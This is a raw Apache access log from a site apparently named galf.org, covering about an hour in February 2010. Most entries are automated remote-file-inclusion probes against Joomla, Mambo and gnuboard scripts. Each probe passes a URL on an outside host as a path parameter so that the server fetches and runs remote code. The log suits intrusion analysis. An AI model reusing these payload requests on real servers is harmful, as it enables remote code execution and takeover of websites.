122.252.1.109 - - [07/Feb/2010:18:10:51 -0800] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:18:11:00 -0800] "GET /index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:18:11:00 -0800] "GET /logs/access_090720.log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:18:11:00 -0800] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:18:11:19 -0800] "GET /logs/access_090720.log//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:18:11:19 -0800] "GET /index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.252.1.109 - - [07/Feb/2010:18:11:19 -0800] "GET /logs//index.php?option=com_chronocontact&mosConfig.absolute.path=http://www.fond7.ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.189 - - [07/Feb/2010:18:11:20 -0800] "GET /logs//delete_all.php?board_skin_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
110.45.146.189 - - [07/Feb/2010:18:11:20 -0800] "GET /delete_all.php?board_skin_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:18:14:19 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:18:14:19 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:17:43 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:18:20:16 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:18:20:16 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:18:20:16 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:18:20:33 -0800] "GET /logs/access_090720.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:18:20:41 -0800] "GET /logs/access_090817.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
41.220.75.3 - - [07/Feb/2010:18:23:31 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.com/search?q=Index+of%2Flog.zip&hl=en&lr=&num=100&sa=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Crazy Browser 2.0.1)" "www.galf.org"
110.45.145.178 - - [07/Feb/2010:18:23:32 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
109.123.78.44 - - [07/Feb/2010:18:24:17 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:24:17 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:24:17 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:24:19 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:24:19 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:24:20 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:18:24:31 -0800] "GET /logs/access_090817.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:18:25:22 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:18:25:22 -0800] "GET /delete_all.php?board_skin_path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:18:25:22 -0800] "GET /logs//delete_all.php?board_skin_path=http://allelon.org/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:26:34 -0800] "GET /logs/access_100201.log///bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
65.55.207.132 - - [07/Feb/2010:18:27:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.207.132 - - [07/Feb/2010:18:28:29 -0800] "GET /logs/access_091109.log HTTP/1.1" 200 65536 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:28:53 -0800] "GET /logs/access.log///bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:28:56 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:28:56 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:29:00 -0800] "GET /logs/access_100201.log///bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:18:33:18 -0800] "GET /logs/access.log///bbs/delete_all.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:18:33:18 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:18:33:18 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:18:33:18 -0800] "GET /logs/access_100201.log///bbs/delete_all.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:18:34:43 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:18:34:43 -0800] "GET /delete_all.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:18:34:44 -0800] "GET /logs//delete_all.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [07/Feb/2010:18:35:08 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [07/Feb/2010:18:35:08 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [07/Feb/2010:18:35:08 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.146.84 - - [07/Feb/2010:18:36:14 -0800] "GET /logs/access_100201.log//delete_all.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:18:36:26 -0800] "GET ///bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:18:36:26 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:18:36:26 -0800] "GET /logs/access.log////bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:18:36:31 -0800] "GET /logs/access_100201.log////bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [07/Feb/2010:18:36:34 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [07/Feb/2010:18:36:34 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [07/Feb/2010:18:36:34 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
109.123.78.44 - - [07/Feb/2010:18:37:04 -0800] "GET /logs/access.log////bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:37:04 -0800] "GET ///bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:37:04 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:39:27 -0800] "GET /logs/access_100201.log////bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:18:40:38 -0800] "GET /logs/access_100201.log%20%20///bbs/delete_all.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [07/Feb/2010:18:41:04 -0800] "GET /logs/access.log///skin/ggambo7002_board/write.php?dir=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [07/Feb/2010:18:41:04 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [07/Feb/2010:18:41:05 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
222.103.87.96 - - [07/Feb/2010:18:43:01 -0800] "GET /logs/access.log%20%20///bbs/delete_all.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [07/Feb/2010:18:43:27 -0800] "GET /logs/access.log///skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.250.252.242 - - [07/Feb/2010:18:44:14 -0800] "GET /logs/access_091005.log HTTP/1.1" 200 7786947 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
110.45.145.178 - - [07/Feb/2010:18:44:46 -0800] "GET /logs/access.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.146.84 - - [07/Feb/2010:18:45:31 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:18:45:31 -0800] "GET /delete_comment.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:18:45:31 -0800] "GET /logs//delete_comment.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:18:45:49 -0800] "GET /logs/access_100201.log//delete_comment.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:18:46:30 -0800] "GET /delete_comment.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:18:46:30 -0800] "GET /logs//delete_comment.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:18:46:30 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:18:46:59 -0800] "GET /logs/access_100201.log//delete_comment.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [07/Feb/2010:18:47:50 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
211.95.78.56 - - [07/Feb/2010:18:47:50 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
211.95.78.56 - - [07/Feb/2010:18:47:50 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [07/Feb/2010:18:49:51 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:18:49:51 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:18:49:51 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:18:49:53 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:18:49:53 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:18:49:53 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:18:50:30 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:18:50:56 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [07/Feb/2010:18:52:37 -0800] "GET /cendoc/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:18:55:24 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [07/Feb/2010:18:55:31 -0800] "GET /logs/access_091214.log/setup.php?dir=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [07/Feb/2010:18:55:34 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [07/Feb/2010:18:55:34 -0800] "GET /logs/setup.php?dir=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:56:34 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:56:34 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:18:57:16 -0800] "GET /logs/access_090720.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:18:58:23 -0800] "GET /logs/access_090720.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:18:59:38 -0800] "GET /logs/access_100201.log///bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:19:00:58 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:19:00:58 -0800] "GET /logs/access_100201.log//skin/board/moviefl/download.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:19:00:58 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:19:01:07 -0800] "GET /logs/access.log//skin/board/moviefl/download.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [07/Feb/2010:19:03:13 -0800] "GET /logs/setup.php?dir=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [07/Feb/2010:19:03:14 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [07/Feb/2010:19:03:18 -0800] "GET /logs/access_091214.log/setup.php?dir=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:19:03:26 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:19:03:26 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:19:03:26 -0800] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:19:03:58 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:19:07:50 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:19:07:56 -0800] "GET /logs/access_091012.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:19:08:05 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:19:08:05 -0800] "GET /logs/access_100201.log//skin/board/moviefl/download.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:19:08:05 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:19:08:16 -0800] "GET /logs/access.log//skin/board/moviefl/download.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:19:16:57 -0800] "GET /logs/access_100201.log//download.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:19:16:57 -0800] "GET /download.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:19:16:58 -0800] "GET /logs//download.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:19:17:03 -0800] "GET /logs/access_090907.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:19:17:03 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:19:17:03 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
